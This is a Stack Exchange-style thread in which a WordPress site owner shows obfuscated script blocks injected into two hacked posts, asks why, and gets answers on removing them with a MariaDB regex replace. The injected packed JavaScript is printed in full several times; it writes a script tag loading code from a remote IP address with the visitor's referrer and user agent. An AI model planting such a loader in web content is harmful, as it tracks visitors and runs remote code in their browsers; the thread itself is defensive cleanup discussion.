Here is example of code I have seen inserted in two different posts:

<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\\o="+3(j.i)+"\'><\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hkfkr|var|u0026u|referrer|fdrht||js|php'.split('|'),0,{}))
</script></noindex>

Second Example:

<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kzfke|var|u0026u|referrer|dabzy||js|php'.split('|'),0,{}))
</script></noindex>

Why would hacker get out of this?

How can I do a mass-replace. Can I do a regex in MYSQL and update the WP-Posts directly? Seems like just a few letters are different on each one.

Here is example of code I have seen inserted in two different posts:

<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\\o="+3(j.i)+"\'><\\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hkfkr|var|u0026u|referrer|fdrht||js|php'.split('|'),0,{}))
</script></noindex>

Second Example:

<noindex><script id="wpinfo-pst1" type="text/javascript" rel="nofollow">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<a g=\'2\' c=\'d\' e=\'b/2\' 4=\'7://5.8.9.f/1/h.s.t?r="+3(0.p)+"\o="+3(j.i)+"\'><\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kzfke|var|u0026u|referrer|dabzy||js|php'.split('|'),0,{}))
</script></noindex>

Why would hacker get out of this?

How can I do a mass-replace. Can I do a regex in MYSQL and update the WP-Posts directly? Seems like just a few letters are different on each one.

• hacked

Share Improve this question asked Apr 12, 2019 at 21:34 NealWaltersNealWalters 4881010 silver badges2121 bronze badges 1

• Are you investigating this just for learning purposes? Or do you need help cleaning up an infected site? It's two questions in one thread. – user3135691 Commented Apr 12, 2019 at 22:25

Add a comment  | 

3 Answers 3

Sorted by: Reset to default 1

As I was using MariaDB, the following update did the fix:

update wp_posts set post_content = REGEXP_REPLACE(post_content,'(*CRLF)<noindex>.*</noindex> ','')

See https://dba.stackexchange/questions/234774/mariadb-multiline-regex/234778#234778

I'm sorry to see your site has malicious code in it. Unfortunately, helping to fix compromised sites is outside the scope of this community.

I can answer your first question, though. This code appears to be garbled, but it is redirecting traffic from your site to some IP address with a path. I can't say exactly why, but this is usually to generate referral traffic, generate cryptocurrency, or compromise browsers in an effort to glean valuable personal information.

It's dangerous to your visitors to leave this code on your site.

There is lots of info on the googles (or bings, or ducks) about how to clean up a site. And it is true that your question is out of scope for this place.

But, it is something that is asked often. Code that you don't recognize is probably dangerous to your site and your visitors. (Like the code that was inside the "Yellow Pencil" theme, and other themes/plugins that have been compromised.)

So, cleaning is important. And it can be done, although it is a bit of work (I've done it for clients).

See my (accepted) answer here on my recommendations: Is this a hacking script in function.php? . If it was my site (or one that I manage), that's the procedure I would use to clean up a site.